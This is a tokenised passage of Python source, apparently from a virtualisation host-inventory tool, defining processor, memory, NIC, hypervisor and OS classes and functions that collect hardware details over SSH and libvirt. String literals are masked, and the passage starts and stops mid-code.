text += '<STR_LIT>' + self . processor_family + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . processor_manufacturer + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . processor_version + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . processor_features ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> text += '<STR_LIT>' + self . memory_type + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . memory_freq ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . memory_nr_channels ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . memory_size ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> text += self . hypervisor . to_text ( ) <EOL> text += '<STR_LIT>' <EOL> text += self . os . to_text ( ) <EOL> text += '<STR_LIT>' <EOL> text += '<STR_LIT>' + str ( len ( self . nodes ) ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> for node_k , node_v in self . nodes . iteritems ( ) : <EOL> text += '<STR_LIT>' + str ( node_k ) + '<STR_LIT>' <EOL> text += node_v . to_text ( ) <EOL> return text <EOL> def to_yaml ( self ) : <EOL> return yaml . load ( self . to_text ( ) ) <EOL> class Node ( ) : <EOL> def __init__ ( self ) : <EOL> self . id_ = None <EOL> self . processor = ProcessorNode ( ) <EOL> self . memory = MemoryNode ( ) <EOL> self . nic_list = list ( ) <EOL> self . ports_list = list ( ) <EOL> def get_processor_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . processor . get_info ( ) <EOL> def get_memory_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . memory . get_info ( ) <EOL> def set ( self , processor , memory , nic_list ) : <EOL> ( status , return_code ) = self . processor . assign ( processor ) <EOL> if not status : <EOL> return ( status , return_code ) <EOL> self . id_ = processor . id_ <EOL> ( status , return_code ) = self . memory . assign ( memory ) <EOL> if not status : <EOL> return ( status , return_code ) <EOL> for nic in nic_list : <EOL> if not isinstance ( nic , Nic ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . nic_list . append ( nic ) <EOL> for port_key in nic . ports . iterkeys ( ) : <EOL> if port_key in self . ports_list : <EOL> return ( False , '<STR_LIT>' + port_key + '<STR_LIT>' ) <EOL> self . ports_list . append ( port_key ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def assign ( self , node ) : <EOL> """<STR_LIT>""" <EOL> warning_text = "<STR_LIT>" <EOL> processor = node . processor <EOL> memory = node . memory <EOL> nic_list = node . nic_list <EOL> ( status , return_code ) = self . processor . assign ( processor ) <EOL> if not status : <EOL> return ( status , return_code ) <EOL> self . id_ = processor . id_ <EOL> ( status , return_code ) = self . memory . assign ( memory ) <EOL> if not status : <EOL> return ( status , return_code ) <EOL> warning_text += code <EOL> for nic in nic_list : <EOL> if not isinstance ( nic , Nic ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . nic_list . append ( nic ) <EOL> for port_key in nic . ports . iterkeys ( ) : <EOL> if port_key in self . ports_list : <EOL> return ( False , '<STR_LIT>' + port_key + '<STR_LIT>' ) <EOL> self . ports_list . append ( port_key ) <EOL> return ( True , warning_text ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . id_ ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> text += self . processor . to_text ( ) <EOL> text += '<STR_LIT>' <EOL> text += self . memory . to_text ( ) <EOL> if len ( self . nic_list ) > <NUM_LIT:0> : <EOL> text += '<STR_LIT>' <EOL> nic_index = <NUM_LIT:0> <EOL> for nic in self . nic_list : <EOL> text += '<STR_LIT>' + str ( nic_index ) + '<STR_LIT>' <EOL> text += nic . to_text ( ) <EOL> nic_index += <NUM_LIT:1> <EOL> return text <EOL> class ProcessorNode ( ) : <EOL> possible_features = definitionsClass . processor_possible_features <EOL> possible_manufacturers = definitionsClass . processor_possible_manufacturers <EOL> possible_families = definitionsClass . processor_possible_families <EOL> possible_versions = definitionsClass . processor_possible_versions <EOL> def __init__ ( self ) : <EOL> self . id_ = None <EOL> self . family = None <EOL> self . manufacturer = None <EOL> self . version = None <EOL> self . features = list ( ) <EOL> self . cores = list ( ) <EOL> self . eligible_cores = list ( ) <EOL> def assign ( self , processor ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( processor , ProcessorNode ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . id_ = processor . id_ <EOL> self . family = processor . family <EOL> self . manufacturer = processor . manufacturer <EOL> self . version = processor . version <EOL> self . features = processor . features <EOL> self . cores = processor . cores <EOL> self . eligible_cores = processor . eligible_cores <EOL> return ( True , "<STR_LIT>" ) <EOL> def set ( self , id_ , family , manufacturer , version , features , cores ) : <EOL> """<STR_LIT>""" <EOL> warning_text = "<STR_LIT>" <EOL> if not isinstance ( id_ , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( family , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( manufacturer , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( version , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( features , list ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( cores , list ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> ( self . id_ , self . family , self . manufacturer , self . version ) = ( id_ , family , manufacturer , version ) <EOL> if not manufacturer in self . possible_manufacturers : <EOL> warning_text += "<STR_LIT>" % ( manufacturer , str ( self . possible_manufacturers ) ) <EOL> if not family in self . possible_families : <EOL> warning_text += "<STR_LIT>" % ( family , str ( self . possible_families ) ) <EOL> for feature in features : <EOL> if not feature in self . possible_features : <EOL> warning_text += "<STR_LIT>" % ( feature , str ( self . possible_versions ) ) <EOL> self . features . append ( feature ) <EOL> if '<STR_LIT>' in self . features : <EOL> for iterator in sorted ( cores ) : <EOL> if not isinstance ( iterator , list ) or len ( iterator ) != <NUM_LIT:2> or not isinstance ( iterator [ <NUM_LIT:0> ] , int ) or not isinstance ( iterator [ <NUM_LIT:1> ] , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . cores . append ( iterator ) <EOL> else : <EOL> for iterator in sorted ( cores ) : <EOL> if not isinstance ( iterator , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . cores . append ( iterator ) <EOL> self . set_eligible_cores ( ) <EOL> return ( True , warning_text ) <EOL> def set_eligible_cores ( self ) : <EOL> """<STR_LIT>""" <EOL> not_first = False <EOL> for iterator in self . cores : <EOL> if not_first : <EOL> self . eligible_cores . append ( iterator ) <EOL> else : <EOL> not_first = True <EOL> return <EOL> def get_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . family , self . manufacturer , self . version , self . features ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . id_ ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . family + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . manufacturer + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . version + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . features ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . cores ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . eligible_cores ) + '<STR_LIT:\n>' <EOL> return text <EOL> class MemoryNode ( ) : <EOL> def __init__ ( self ) : <EOL> self . modules = list ( ) <EOL> self . nr_channels = None <EOL> self . node_size = None <EOL> self . eligible_memory = None <EOL> self . hugepage_sz = None <EOL> self . hugepage_nr = None <EOL> self . eligible_hugepage_nr = None <EOL> self . type_ = None <EOL> self . freq = None <EOL> self . module_size = None <EOL> self . form_factor = None <EOL> def assign ( self , memory_node ) : <EOL> return self . set ( memory_node . modules , memory_node . hugepage_sz , memory_node . hugepage_nr ) <EOL> def set ( self , modules , hugepage_sz , hugepage_nr ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( modules , list ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( hugepage_sz , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( hugepage_nr , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> ( self . hugepage_sz , self . hugepage_nr ) = ( hugepage_sz , hugepage_nr ) <EOL> self . node_size = self . nr_channels = <NUM_LIT:0> <EOL> different_type = different_freq = different_module_size = different_form_factor = False <EOL> prev_type = prev_freq = prev_module_size = prev_form_factor = None <EOL> for iterator in modules : <EOL> if not isinstance ( iterator , MemoryModule ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . modules . append ( iterator ) <EOL> ( self . type_ , self . freq , self . module_size , self . form_factor ) = ( iterator . type_ , iterator . freq , iterator . size , iterator . form_factor ) <EOL> self . node_size += self . module_size <EOL> self . nr_channels += <NUM_LIT:1> <EOL> if prev_type != None and prev_type != self . type_ : <EOL> different_type = True <EOL> if prev_freq != None and prev_freq != self . freq : <EOL> different_freq = True <EOL> if prev_module_size != None and prev_module_size != self . module_size : <EOL> different_module_size = True <EOL> if prev_form_factor != None and prev_form_factor != self . form_factor : <EOL> different_form_factor = True <EOL> ( prev_type , prev_freq , prev_module_size , prev_form_factor ) = ( self . type_ , self . freq , self . module_size , self . form_factor ) <EOL> if different_type : <EOL> self . type_ = None <EOL> if different_freq : <EOL> self . freq = None <EOL> if different_module_size : <EOL> self . module_size = None <EOL> if different_form_factor : <EOL> self . form_factor = None <EOL> ( return_value , error_code ) = self . set_eligible_memory ( ) <EOL> if not return_value : <EOL> return ( return_value , error_code ) <EOL> return ( True , "<STR_LIT>" ) <EOL> def set_eligible_memory ( self ) : <EOL> """<STR_LIT>""" <EOL> self . eligible_memory = self . node_size - <NUM_LIT:2> * <NUM_LIT> * <NUM_LIT> <EOL> if self . eligible_memory < <NUM_LIT:0> : <EOL> return ( False , "<STR_LIT>" ) <EOL> self . eligible_hugepage_nr = self . hugepage_nr <EOL> return ( True , "<STR_LIT>" ) <EOL> def get_info ( self ) : <EOL> """<STR_LIT>""" <EOL> return ( self . freq , self . nr_channels , self . type_ , self . node_size , self . hugepage_sz ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . node_size ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . nr_channels ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . eligible_memory ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . hugepage_sz ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . hugepage_nr ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . eligible_hugepage_nr ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . type_ + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . freq ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . module_size ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . form_factor + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' <EOL> for module in self . modules : <EOL> text += module . to_text ( ) <EOL> return text <EOL> class MemoryModule ( ) : <EOL> possible_types = definitionsClass . memory_possible_types <EOL> possible_form_factors = definitionsClass . memory_possible_form_factors <EOL> def __init__ ( self ) : <EOL> self . locator = None <EOL> self . type_ = None <EOL> self . freq = None <EOL> self . size = None <EOL> self . form_factor = None <EOL> def set ( self , locator , type_ , freq , size , form_factor ) : <EOL> """<STR_LIT>""" <EOL> warning_text = "<STR_LIT>" <EOL> if not isinstance ( locator , str ) : <EOL> return ( False , "<STR_LIT>" ) <EOL> if not isinstance ( type_ , str ) : <EOL> return ( False , "<STR_LIT>" ) <EOL> if not isinstance ( form_factor , str ) : <EOL> return ( False , "<STR_LIT>" ) <EOL> if not isinstance ( freq , int ) : <EOL> return ( False , "<STR_LIT>" ) <EOL> if not isinstance ( size , int ) : <EOL> return ( False , "<STR_LIT>" ) <EOL> if not form_factor in self . possible_form_factors : <EOL> warning_text += "<STR_LIT>" % ( form_factor , str ( self . possible_form_factors ) ) <EOL> if not type_ in self . possible_types : <EOL> warning_text += "<STR_LIT>" % ( type_ , str ( self . possible_types ) ) <EOL> ( self . locator , self . type_ , self . freq , self . size , self . form_factor ) = ( locator , type_ , freq , size , form_factor ) <EOL> return ( True , warning_text ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT:U+0020>' + self . locator + '<STR_LIT>' <EOL> text += '<STR_LIT>' + self . type_ + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . freq ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . size ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . form_factor + '<STR_LIT:\n>' <EOL> return text <EOL> class Nic ( ) : <EOL> def __init__ ( self ) : <EOL> self . model = None <EOL> self . ports = dict ( ) <EOL> def set_model ( self , model ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( model , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> self . model = model <EOL> return ( True , "<STR_LIT>" ) <EOL> def add_port ( self , port ) : <EOL> """<STR_LIT>""" <EOL> if not isinstance ( port , Port ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> port_id = port . pci_device_id <EOL> if port_id in self . ports : <EOL> return ( False , '<STR_LIT>' + port . pci_device_id + '<STR_LIT>' ) <EOL> self . ports [ port_id ] = port <EOL> return ( True , "<STR_LIT>" ) <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . model ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + '<STR_LIT:\n>' <EOL> for key , port in self . ports . iteritems ( ) : <EOL> text += '<STR_LIT>' + key + '<STR_LIT>' + '<STR_LIT:\n>' <EOL> text += port . to_text ( ) <EOL> return text <EOL> class Port ( ) : <EOL> def __init__ ( self ) : <EOL> self . name = None <EOL> self . virtual = None <EOL> self . enabled = None <EOL> self . eligible = None <EOL> self . speed = None <EOL> self . available_bw = None <EOL> self . mac = None <EOL> self . pci_device_id_split = None <EOL> self . pci_device_id = None <EOL> self . PF_pci_device_id = None <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + str ( self . pci_device_id ) + '<STR_LIT>' <EOL> text += '<STR_LIT>' + str ( self . virtual ) + '<STR_LIT:\n>' <EOL> if self . virtual : <EOL> text += '<STR_LIT>' + self . PF_pci_device_id + '<STR_LIT>' <EOL> text += '<STR_LIT>' + str ( self . eligible ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . enabled ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . speed ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . available_bw ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . mac ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . name ) + '<STR_LIT:\n>' <EOL> return text <EOL> class Hypervisor ( ) : <EOL> possible_types = definitionsClass . hypervisor_possible_types <EOL> possible_domain_types = definitionsClass . hypervisor_possible_domain_types <EOL> def __init__ ( self ) : <EOL> self . type_ = None <EOL> self . version = None <EOL> self . lib_version = None <EOL> self . domains = list ( ) <EOL> def set ( self , hypervisor , version , lib_version , domains ) : <EOL> warning_text = "<STR_LIT>" <EOL> if not isinstance ( hypervisor , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( version , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( lib_version , int ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( domains , list ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not hypervisor in self . possible_types : <EOL> warning_text += "<STR_LIT>" % ( hypervisor , str ( self . possible_types ) ) <EOL> valid_domain_found = False <EOL> for domain in domains : <EOL> if not isinstance ( domain , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if domain in self . possible_domain_types : <EOL> valid_domain_found = True <EOL> self . domains . append ( domain ) <EOL> if not valid_domain_found : <EOL> warning_text += '<STR_LIT>' % str ( self . possible_domain_types ) <EOL> ( self . version , self . lib_version , self . type_ ) = ( version , lib_version , hypervisor ) <EOL> return ( True , warning_text ) <EOL> def assign ( self , hypervisor ) : <EOL> ( self . version , self . lib_version , self . type_ ) = ( hypervisor . version , hypervisor . lib_version , hypervisor . type_ ) <EOL> for domain in hypervisor . domains : <EOL> self . domains . append ( domain ) <EOL> return <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + self . type_ + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . version ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . lib_version ) + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + str ( self . domains ) + '<STR_LIT:\n>' <EOL> return text <EOL> class OpSys ( ) : <EOL> possible_id = definitionsClass . os_possible_id <EOL> possible_types = definitionsClass . os_possible_types <EOL> possible_architectures = definitionsClass . os_possible_architectures <EOL> def __init__ ( self ) : <EOL> self . id_ = None <EOL> self . type_ = None <EOL> self . bit_architecture = None <EOL> def set ( self , id_ , type_ , bit_architecture ) : <EOL> warning_text = "<STR_LIT>" <EOL> if not isinstance ( type_ , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( id_ , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not isinstance ( bit_architecture , str ) : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not type_ in self . possible_types : <EOL> warning_text += "<STR_LIT>" % ( type_ , str ( self . possible_types ) ) <EOL> if not id_ in self . possible_id : <EOL> warning_text += "<STR_LIT>" % ( id_ , str ( self . possible_id ) ) <EOL> if not bit_architecture in self . possible_architectures : <EOL> warning_text += "<STR_LIT>" % ( bit_architecture , str ( self . possible_architectures ) ) <EOL> ( self . id_ , self . type_ , self . bit_architecture ) = ( id_ , type_ , bit_architecture ) <EOL> return ( True , warning_text ) <EOL> def assign ( self , os ) : <EOL> ( self . id_ , self . type_ , self . bit_architecture ) = ( os . id_ , os . type_ , os . bit_architecture ) <EOL> return <EOL> def to_text ( self ) : <EOL> text = '<STR_LIT>' + self . id_ + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . type_ + '<STR_LIT:\n>' <EOL> text += '<STR_LIT>' + self . bit_architecture + '<STR_LIT:\n>' <EOL> return text <EOL> def get_hostname ( virsh_conn ) : <EOL> return virsh_conn . getHostname ( ) . rstrip ( '<STR_LIT:\n>' ) <EOL> def get_hugepage_size ( ssh_conn ) : <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> mem = stdout . read ( ) <EOL> if mem == "<STR_LIT>" : <EOL> return <NUM_LIT:0> <EOL> return int ( mem ) <EOL> def get_hugepage_nr ( ssh_conn , hugepage_sz , node_id ) : <EOL> command = '<STR_LIT>' + str ( node_id ) + '<STR_LIT>' + str ( hugepage_sz / <NUM_LIT> ) + '<STR_LIT>' <EOL> ( _ , stdout , _ ) = ssh_conn . exec_command ( command ) <EOL> try : <EOL> value = int ( stdout . read ( ) ) <EOL> except : <EOL> value = <NUM_LIT:0> <EOL> return value <EOL> def get_memory_information ( ssh_conn , virsh_conn , memory_nodes ) : <EOL> warning_text = "<STR_LIT>" <EOL> tree = ElementTree . fromstring ( virsh_conn . getSysinfo ( <NUM_LIT:0> ) ) <EOL> memory_dict = dict ( ) <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> locator_f = size_f = freq_f = type_f = formfactor_f = False <EOL> module_form_factor = "<STR_LIT>" <EOL> for entry in target . findall ( "<STR_LIT>" ) : <EOL> if entry . get ( "<STR_LIT:name>" ) == '<STR_LIT:size>' : <EOL> size_f = True <EOL> size_split = entry . text . split ( '<STR_LIT:U+0020>' ) <EOL> if size_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_size = int ( size_split [ <NUM_LIT:0> ] ) * <NUM_LIT> * <NUM_LIT> <EOL> elif size_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_size = int ( size_split [ <NUM_LIT:0> ] ) * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> <EOL> elif size_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_size = int ( size_split [ <NUM_LIT:0> ] ) * <NUM_LIT> <EOL> else : <EOL> module_size = int ( size_split [ <NUM_LIT:0> ] ) <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> freq_f = True <EOL> freq_split = entry . text . split ( '<STR_LIT:U+0020>' ) <EOL> if freq_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_freq = int ( freq_split [ <NUM_LIT:0> ] ) * <NUM_LIT> * <NUM_LIT> <EOL> elif freq_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_freq = int ( freq_split [ <NUM_LIT:0> ] ) * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> <EOL> elif freq_split [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> module_freq = int ( freq_split [ <NUM_LIT:0> ] ) * <NUM_LIT> <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT:type>' : <EOL> type_f = True <EOL> module_type = entry . text <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> formfactor_f = True <EOL> module_form_factor = entry . text <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' and not locator_f : <EOL> locator = entry . text <EOL> pos = locator . find ( module_form_factor ) <EOL> if module_form_factor == locator [ <NUM_LIT:0> : len ( module_form_factor ) ] : <EOL> pos = len ( module_form_factor ) + <NUM_LIT:1> <EOL> else : <EOL> pos = <NUM_LIT:0> <EOL> if locator [ pos ] in "<STR_LIT>" : <EOL> locator_f = True <EOL> node_id = ord ( locator [ pos ] ) - ord ( '<STR_LIT:A>' ) <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> locator = entry . text <EOL> pos = locator . find ( "<STR_LIT>" ) <EOL> if pos >= <NUM_LIT:0> and len ( locator ) > pos + <NUM_LIT:5> : <EOL> if locator [ pos + <NUM_LIT:5> ] in ( "<STR_LIT>" ) : <EOL> node_id = int ( locator [ pos + <NUM_LIT:5> ] ) <EOL> locator_f = True <EOL> if locator_f and size_f and freq_f and type_f and formfactor_f : <EOL> if node_id not in memory_dict : <EOL> memory_dict [ node_id ] = [ ] <EOL> module = MemoryModule ( ) <EOL> ( return_status , code ) = module . set ( locator , module_type , module_freq , module_size , module_form_factor ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> memory_dict [ node_id ] . append ( module ) <EOL> if code not in warning_text : <EOL> warning_text += code <EOL> hugepage_sz = get_hugepage_size ( ssh_conn ) <EOL> for node_id , modules in memory_dict . iteritems ( ) : <EOL> memory_node = MemoryNode ( ) <EOL> memory_node . set ( modules , hugepage_sz , get_hugepage_nr ( ssh_conn , hugepage_sz , node_id ) ) <EOL> memory_nodes [ node_id ] = memory_node <EOL> return ( True , warning_text ) <EOL> def get_cpu_topology_ht ( ssh_conn , topology ) : <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> sockets = [ ] <EOL> cores = [ ] <EOL> core_map = { } <EOL> core_details = [ ] <EOL> core_lines = { } <EOL> for line in stdout . readlines ( ) : <EOL> if len ( line . strip ( ) ) != <NUM_LIT:0> : <EOL> name , value = line . split ( "<STR_LIT::>" , <NUM_LIT:1> ) <EOL> core_lines [ name . strip ( ) ] = value . strip ( ) <EOL> else : <EOL> core_details . append ( core_lines ) <EOL> core_lines = { } <EOL> for core in core_details : <EOL> for field in [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if field not in core : <EOL> return ( False , '<STR_LIT>' + field + '<STR_LIT>' ) <EOL> core [ field ] = int ( core [ field ] ) <EOL> if core [ "<STR_LIT>" ] not in cores : <EOL> cores . append ( core [ "<STR_LIT>" ] ) <EOL> if core [ "<STR_LIT>" ] not in sockets : <EOL> sockets . append ( core [ "<STR_LIT>" ] ) <EOL> key = ( core [ "<STR_LIT>" ] , core [ "<STR_LIT>" ] ) <EOL> if key not in core_map : <EOL> core_map [ key ] = [ ] <EOL> core_map [ key ] . append ( core [ "<STR_LIT>" ] ) <EOL> for s in sockets : <EOL> hyperthreaded_cores = list ( ) <EOL> for c in cores : <EOL> hyperthreaded_cores . append ( core_map [ ( s , c ) ] ) <EOL> topology [ s ] = hyperthreaded_cores <EOL> return ( True , "<STR_LIT>" ) <EOL> def get_processor_information ( ssh_conn , vish_conn , processors ) : <EOL> warning_text = "<STR_LIT>" <EOL> capabilities = list ( ) <EOL> tree = ElementTree . fromstring ( vish_conn . getCapabilities ( ) ) <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> if target . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> elif target . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> elif target . get ( "<STR_LIT:name>" ) == '<STR_LIT>' or target . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> elif target . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> target = tree . find ( "<STR_LIT>" ) <EOL> if target . text == '<STR_LIT>' or target . text == '<STR_LIT>' : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> line = stdout . readline ( ) <EOL> if '<STR_LIT>' in line or '<STR_LIT>' in line : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> if '<STR_LIT>' in stdout . read ( ) : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> command = '<STR_LIT>' <EOL> ( _ , stdout , stderr ) = ssh_conn . exec_command ( command ) <EOL> error = stderr . read ( ) <EOL> if len ( error ) > <NUM_LIT:0> : <EOL> raise paramiko . ssh_exception . SSHException ( command + '<STR_LIT>' + error ) <EOL> if len ( stdout . read ( ) ) > <NUM_LIT:0> : <EOL> capabilities . append ( '<STR_LIT>' ) <EOL> topology = dict ( ) <EOL> if '<STR_LIT>' in capabilities : <EOL> ( return_status , code ) = get_cpu_topology_ht ( ssh_conn , topology ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> warning_text += code <EOL> else : <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> socket_id = int ( target . get ( "<STR_LIT:id>" ) ) <EOL> topology [ socket_id ] = list ( ) <EOL> for cpu in target . findall ( "<STR_LIT>" ) : <EOL> topology [ socket_id ] . append ( int ( cpu . get ( "<STR_LIT:id>" ) ) ) <EOL> tree = ElementTree . fromstring ( vish_conn . getSysinfo ( <NUM_LIT:0> ) ) <EOL> not_populated = False <EOL> socket_id = - <NUM_LIT:1> <EOL> for target in tree . findall ( "<STR_LIT>" ) : <EOL> count = <NUM_LIT:0> <EOL> socket_id += <NUM_LIT:1> <EOL> for entry in target . findall ( "<STR_LIT>" ) : <EOL> if entry . get ( "<STR_LIT:name>" ) == "<STR_LIT:status>" : <EOL> if entry . text [ <NUM_LIT:0> : <NUM_LIT:11> ] == "<STR_LIT>" : <EOL> not_populated = True <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> socket_text = entry . text <EOL> if socket_text . startswith ( '<STR_LIT>' ) : <EOL> socket_text = socket_text . strip ( '<STR_LIT>' ) <EOL> socket_text = socket_text . strip ( ) <EOL> if socket_text . isdigit ( ) and int ( socket_text ) < <NUM_LIT:9> and int ( socket_text ) > <NUM_LIT:0> : <EOL> socket_id = int ( socket_text ) - <NUM_LIT:1> <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> family = entry . text <EOL> count += <NUM_LIT:1> <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT>' : <EOL> manufacturer = entry . text <EOL> count += <NUM_LIT:1> <EOL> elif entry . get ( "<STR_LIT:name>" ) == '<STR_LIT:version>' : <EOL> version = entry . text . strip ( ) <EOL> count += <NUM_LIT:1> <EOL> if count != <NUM_LIT:3> : <EOL> return ( False , '<STR_LIT>' ) <EOL> if not_populated : <EOL> continue <EOL> processor = ProcessorNode ( ) <EOL> ( return_status , code ) = processor . set ( socket_id , family , manufacturer , version , capabilities , topology [ socket_id ] ) <EOL> if not return_status : <EOL> return ( return_status , code ) <EOL> if code not in warning_text : <EOL> warning_text += code <EOL> processors [ socket_id ] = processor <EOL> return ( True , warning_text ) <EOL> def get_nic_information ( ssh_conn , virsh_conn , nic_topology ) : <EOL> warning_text = "<STR_LIT>" <EOL> net_devices = virsh_conn . listDevices ( 